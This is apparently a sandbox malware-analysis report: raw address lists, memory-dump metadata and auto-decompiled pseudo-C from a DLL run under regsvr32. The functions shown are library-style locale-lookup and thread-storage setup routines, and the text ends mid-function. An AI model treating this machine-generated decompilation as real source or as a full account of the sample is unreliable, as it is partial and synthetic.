                                                                                                                0x1004ae31
                                                                                                                0x1004aeb0
                                                                                                                0x1004aeb2
                                                                                                                0x1004aeb4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aec0
                                                                                                                0x1004af40
                                                                                                                0x1004af42
                                                                                                                0x1004af44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004af4a
                                                                                                                0x1004af50
                                                                                                                0x1004afcf
                                                                                                                0x1004afd1
                                                                                                                0x1004afd3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004afd9
                                                                                                                0x1004afdf
                                                                                                                0x1004b050
                                                                                                                0x1004b052
                                                                                                                0x1004b054
                                                                                                                0x1004b056
                                                                                                                0x1004b056
                                                                                                                0x1004b058
                                                                                                                0x1004bdb4
                                                                                                                0x1004bdb4
                                                                                                                0x1004afe8
                                                                                                                0x1004afea
                                                                                                                0x1004affb
                                                                                                                0x1004b003
                                                                                                                0x1004b005
                                                                                                                0x1004b016
                                                                                                                0x1004b01e
                                                                                                                0x1004b020
                                                                                                                0x1004b035
                                                                                                                0x1004b03d
                                                                                                                0x1004b03f
                                                                                                                0x1004b04c
                                                                                                                0x1004b04c
                                                                                                                0x00000000
                                                                                                                0x1004b03f
                                                                                                                0x1004b029
                                                                                                                0x1004b02f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b031
                                                                                                                0x1004b031
                                                                                                                0x00000000
                                                                                                                0x1004b031
                                                                                                                0x1004b00e
                                                                                                                0x1004b014
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b014
                                                                                                                0x1004aff3
                                                                                                                0x1004aff9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aff9
                                                                                                                0x1004af59
                                                                                                                0x1004af5b
                                                                                                                0x1004af72
                                                                                                                0x1004af7a
                                                                                                                0x1004af7c
                                                                                                                0x1004af93
                                                                                                                0x1004af9b
                                                                                                                0x1004af9d
                                                                                                                0x1004afb4
                                                                                                                0x1004afbc
                                                                                                                0x1004afbe
                                                                                                                0x1004afcb
                                                                                                                0x1004afcb
                                                                                                                0x00000000
                                                                                                                0x1004afbe
                                                                                                                0x1004afaa
                                                                                                                0x1004afae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004afae
                                                                                                                0x1004af89
                                                                                                                0x1004af8d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004af8d
                                                                                                                0x1004af68
                                                                                                                0x1004af6c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004af6c
                                                                                                                0x1004aeca
                                                                                                                0x1004aecc
                                                                                                                0x1004aee3
                                                                                                                0x1004aeeb
                                                                                                                0x1004aeed
                                                                                                                0x1004af04
                                                                                                                0x1004af0c
                                                                                                                0x1004af0e
                                                                                                                0x1004af25
                                                                                                                0x1004af2d
                                                                                                                0x1004af2f
                                                                                                                0x1004af3c
                                                                                                                0x1004af3c
                                                                                                                0x00000000
                                                                                                                0x1004af2f
                                                                                                                0x1004af1b
                                                                                                                0x1004af1f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004af1f
                                                                                                                0x1004aefa
                                                                                                                0x1004aefe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aefe
                                                                                                                0x1004aed9
                                                                                                                0x1004aedd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004aedd
                                                                                                                0x1004ae3a
                                                                                                                0x1004ae3c
                                                                                                                0x1004ae53
                                                                                                                0x1004ae5b
                                                                                                                0x1004ae5d
                                                                                                                0x1004ae74
                                                                                                                0x1004ae7c
                                                                                                                0x1004ae7e
                                                                                                                0x1004ae95
                                                                                                                0x1004ae9d
                                                                                                                0x1004ae9f
                                                                                                                0x1004aeac
                                                                                                                0x1004aeac
                                                                                                                0x00000000
                                                                                                                0x1004ae9f
                                                                                                                0x1004ae8b
                                                                                                                0x1004ae8f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae8f
                                                                                                                0x1004ae6a
                                                                                                                0x1004ae6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae6e
                                                                                                                0x1004ae49
                                                                                                                0x1004ae4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae4d
                                                                                                                0x1004adab
                                                                                                                0x1004adad
                                                                                                                0x1004adc4
                                                                                                                0x1004adcc
                                                                                                                0x1004adce
                                                                                                                0x1004ade5
                                                                                                                0x1004aded
                                                                                                                0x1004adef
                                                                                                                0x1004ae06
                                                                                                                0x1004ae0e
                                                                                                                0x1004ae10
                                                                                                                0x1004ae1d
                                                                                                                0x1004ae1d
                                                                                                                0x00000000
                                                                                                                0x1004ae10
                                                                                                                0x1004adfc
                                                                                                                0x1004ae00
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae00
                                                                                                                0x1004addb
                                                                                                                0x1004addf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004addf
                                                                                                                0x1004adba
                                                                                                                0x1004adbe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004adbe
                                                                                                                0x1004ad1c
                                                                                                                0x1004ad1e
                                                                                                                0x1004ad35
                                                                                                                0x1004ad3d
                                                                                                                0x1004ad3f
                                                                                                                0x1004ad56
                                                                                                                0x1004ad5e
                                                                                                                0x1004ad60
                                                                                                                0x1004ad77
                                                                                                                0x1004ad7f
                                                                                                                0x1004ad81
                                                                                                                0x1004ad8e
                                                                                                                0x1004ad8e
                                                                                                                0x00000000
                                                                                                                0x1004ad81
                                                                                                                0x1004ad6d
                                                                                                                0x1004ad71
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad71
                                                                                                                0x1004ad4c
                                                                                                                0x1004ad50
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad50
                                                                                                                0x1004ad2b
                                                                                                                0x1004ad2f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ac92
                                                                                                                0x1004ac92
                                                                                                                0x1004ac95
                                                                                                                0x1004ac99
                                                                                                                0x1004ac9b
                                                                                                                0x1004acae
                                                                                                                0x1004acae
                                                                                                                0x1004acb2
                                                                                                                0x1004acb6
                                                                                                                0x1004acb8
                                                                                                                0x1004accb
                                                                                                                0x1004accb
                                                                                                                0x1004accf
                                                                                                                0x1004acd3
                                                                                                                0x1004acd5
                                                                                                                0x1004ace8
                                                                                                                0x1004ace8
                                                                                                                0x1004acec
                                                                                                                0x1004acf0
                                                                                                                0x1004acf2
                                                                                                                0x1004acf8
                                                                                                                0x1004acfb
                                                                                                                0x1004acff
                                                                                                                0x1004acff
                                                                                                                0x00000000
                                                                                                                0x1004acf2
                                                                                                                0x1004acdb
                                                                                                                0x1004acde
                                                                                                                0x1004ace2
                                                                                                                0x1004ace6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ace6
                                                                                                                0x1004acbe
                                                                                                                0x1004acc1
                                                                                                                0x1004acc5
                                                                                                                0x1004acc9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004acc9
                                                                                                                0x1004aca1
                                                                                                                0x1004aca4
                                                                                                                0x1004aca8
                                                                                                                0x1004acac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004acac
                                                                                                                0x1004ac83
                                                                                                                0x1004ac83
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction ID: 5b9a8e420182fb4b6de152f1235b7ca268fbd91767dc6c74a702410ea6ff69e6
                                                                                                                • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction Fuzzy Hash: 86C16273D0E9B30A83B5C12D405826BEFA2AFC268133BC3F59CE46F389D52A5D4495D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1005D95D Relevance: .0, Instructions: 46COMMONLIBRARYCODECrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1005D95D(intOrPtr* __ecx, intOrPtr* _a4) {
				signed int _t18;
				signed int _t19;
				signed int _t27;
				signed int _t31;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int _t44;

				_t15 = __ecx;
				_t36 =  *(__ecx + 4);
				_t18 = _t36 << 0x1c;
				_t19 = _t18 >> 0x1c;
				if(_t18 == 0 || _t19 == 2) {
					_t20 = _a4;
					_t3 = _t20 + 4; // 0x100be9d4
					_t27 = ( *_t3 << 0x0000001c >> 0x0000001c ^ _t36) & 0x0000000f ^ _t36;
					 *(_t15 + 4) = _t27;
					_t5 = _t20 + 4; // 0x100be9d4
					_t40 = ( *_t5 ^ _t27) & 0x00000010 ^ _t27;
					 *(_t15 + 4) = _t40;
					_t7 = _t20 + 4; // 0x100be9d4
					_t31 = ( *_t7 ^ _t40) & 0x00000020 ^ _t40;
					 *(_t15 + 4) = _t31;
					_t9 = _t20 + 4; // 0x100be9d4
					_t44 = ( *_t9 ^ _t31) & 0x00000040 ^ _t31;
					 *(_t15 + 4) = _t44;
					_t11 = _t20 + 4; // 0x100be9d4
					_t35 = ( *_t11 ^ _t44) & 0x00000080 ^ _t44;
					 *(_t15 + 4) = _t35;
					_t13 = _t20 + 4; // 0x100be9d4
					 *(_t15 + 4) = ( *_t13 ^ _t35) & 0x00000800 ^ _t35;
					 *_t15 =  *_a4;
					return _t15;
				}
				return __ecx;
			}











                                                                                                                0x1005d95d
                                                                                                                0x1005d960
                                                                                                                0x1005d965
                                                                                                                0x1005d968
                                                                                                                0x1005d96b
                                                                                                                0x1005d972
                                                                                                                0x1005d976
                                                                                                                0x1005d984
                                                                                                                0x1005d986
                                                                                                                0x1005d989
                                                                                                                0x1005d991
                                                                                                                0x1005d993
                                                                                                                0x1005d996
                                                                                                                0x1005d99e
                                                                                                                0x1005d9a0
                                                                                                                0x1005d9a3
                                                                                                                0x1005d9ab
                                                                                                                0x1005d9ad
                                                                                                                0x1005d9b0
                                                                                                                0x1005d9bb
                                                                                                                0x1005d9bd
                                                                                                                0x1005d9c0
                                                                                                                0x1005d9cd
                                                                                                                0x1005d9d2
                                                                                                                0x00000000
                                                                                                                0x1005d9d2
                                                                                                                0x1005d9d5

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3806309510c485df092187976a7821ca5c5acb27e48c45fe9b0aaa0c6170d12f
                                                                                                                • Instruction ID: 56065d2e7ba31eb1f0cabcf7fe8377e24bdfdb9552a93b06c076dd897f8e7659
                                                                                                                • Opcode Fuzzy Hash: 3806309510c485df092187976a7821ca5c5acb27e48c45fe9b0aaa0c6170d12f
                                                                                                                • Instruction Fuzzy Hash: AD011B72E115304B9358DF19CA05556FAD2EFCD61475BC2AAC8496B226D531EC028BC0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100198A8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100198A8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100b9e70; // 0xbb35530
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1004764D(0x1008ed58, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, 0x10018e62, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E1004C7D0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10049170(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					L10018E78(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(L10018F28(_t181 - 0x3c, _t181 - 0x64) != 0) {
						L10018F5E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E1001963E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10019571(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1004763E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                                0x100198a8
                                                                                                                0x100198a9
                                                                                                                0x100198af
                                                                                                                0x100198b3
                                                                                                                0x100198ba
                                                                                                                0x100198c0
                                                                                                                0x100198c7
                                                                                                                0x100198d8
                                                                                                                0x100198df
                                                                                                                0x100198e2
                                                                                                                0x100198e5
                                                                                                                0x100198e8
                                                                                                                0x100198f6
                                                                                                                0x100198f9
                                                                                                                0x100198fd
                                                                                                                0x100199cb
                                                                                                                0x10019a87
                                                                                                                0x10019a8b
                                                                                                                0x10019a9f
                                                                                                                0x10019aa2
                                                                                                                0x10019aac
                                                                                                                0x10019ab2
                                                                                                                0x10019aca
                                                                                                                0x10019ad6
                                                                                                                0x10019adb
                                                                                                                0x10019ade
                                                                                                                0x10019ade
                                                                                                                0x10019aac
                                                                                                                0x100199d1
                                                                                                                0x100199e5
                                                                                                                0x100199f0
                                                                                                                0x10019a06
                                                                                                                0x10019a15
                                                                                                                0x10019a2d
                                                                                                                0x10019a32
                                                                                                                0x10019a38
                                                                                                                0x10019a44
                                                                                                                0x10019a47
                                                                                                                0x10019a59
                                                                                                                0x10019a65
                                                                                                                0x10019a6a
                                                                                                                0x10019a6d
                                                                                                                0x10019a6d
                                                                                                                0x10019a38
                                                                                                                0x10019a77
                                                                                                                0x10019a77
                                                                                                                0x100199f0
                                                                                                                0x10019903
                                                                                                                0x1001990b
                                                                                                                0x1001990e
                                                                                                                0x10019911
                                                                                                                0x10019923
                                                                                                                0x1001992c
                                                                                                                0x10019934
                                                                                                                0x10019941
                                                                                                                0x10019944
                                                                                                                0x1001994b
                                                                                                                0x1001994f
                                                                                                                0x10019953
                                                                                                                0x10019956
                                                                                                                0x10019959
                                                                                                                0x10019966
                                                                                                                0x10019972
                                                                                                                0x10019977
                                                                                                                0x1001997a
                                                                                                                0x1001997a
                                                                                                                0x10019981
                                                                                                                0x10019981
                                                                                                                0x10019986
                                                                                                                0x10019989
                                                                                                                0x100199a0
                                                                                                                0x100199a7
                                                                                                                0x100199b6
                                                                                                                0x10019aec
                                                                                                                0x10019af3
                                                                                                                0x10019b03
                                                                                                                0x10019b06
                                                                                                                0x10019b09
                                                                                                                0x10019b10
                                                                                                                0x10019b13
                                                                                                                0x10019b1a
                                                                                                                0x10019b26
                                                                                                                0x10019b30
                                                                                                                0x10019b35
                                                                                                                0x10019b35
                                                                                                                0x10019b3a
                                                                                                                0x10019b3f
                                                                                                                0x10019b5c
                                                                                                                0x10019b5c
                                                                                                                0x10019b63
                                                                                                                0x10019b68
                                                                                                                0x00000000
                                                                                                                0x10019b41
                                                                                                                0x10019b41
                                                                                                                0x10019b48
                                                                                                                0x10019b50
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019b52
                                                                                                                0x10019b56
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019b58
                                                                                                                0x10019b5a
                                                                                                                0x00000000
                                                                                                                0x10019b5a
                                                                                                                0x100199bc
                                                                                                                0x100199bc
                                                                                                                0x10019b6a
                                                                                                                0x10019b6d
                                                                                                                0x10019b75
                                                                                                                0x10019b76
                                                                                                                0x10019b77
                                                                                                                0x10019b8c
                                                                                                                0x10019b8c

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100198C7
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 100198E8
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 100198F9
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 1001992F
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10019937
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1001994B
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 1001996F
                                                                                                                • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019975
                                                                                                                • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 100199AE
                                                                                                                • GetVersion.KERNEL32 ref: 100199C3
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 100199E8
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10019A0D
                                                                                                                • _sscanf.LIBCMT ref: 10019A2D
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10019A62
                                                                                                                • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10019A68
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10019A77
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10019A87
                                                                                                                • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10018E62,?), ref: 10019AA2
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10019AD3
                                                                                                                • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10019AD9
                                                                                                                • _memset.LIBCMT ref: 10019AF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 434808117-483790700
                                                                                                                • Opcode ID: 1f76b75c5c0de8f23b8189428d9e754c8473ee393acc1e36a57432746dbee113
                                                                                                                • Instruction ID: 2d735a54099eb8c66c4ab65cc8d4ae4af9cbc33185515143b8a473405d5eae94
                                                                                                                • Opcode Fuzzy Hash: 1f76b75c5c0de8f23b8189428d9e754c8473ee393acc1e36a57432746dbee113
                                                                                                                • Instruction Fuzzy Hash: 42817C70D002699ADB10DFA5DC85AEEBBF9FF48340F50012AE955E7280DB789A45CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10051878 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10051878(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x100be428 = GetProcAddress(_t37, "FlsAlloc");
					 *0x100be42c = GetProcAddress(_t37, "FlsGetValue");
					 *0x100be430 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x100be428;
					_t40 = TlsSetValue;
					 *0x100be434 = _t7;
					if( *0x100be428 == 0) {
						L6:
						 *0x100be42c = TlsGetValue;
						 *0x100be428 = E100514EF;
						 *0x100be430 = _t40;
						 *0x100be434 = TlsFree;
					} else {
						__eflags =  *0x100be42c;
						if( *0x100be42c == 0) {
							goto L6;
						} else {
							__eflags =  *0x100be430;
							if( *0x100be430 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x100ba250 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x100be42c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E1004C677();
							 *0x100be428 = E10051420( *0x100be428);
							 *0x100be42c = E10051420( *0x100be42c);
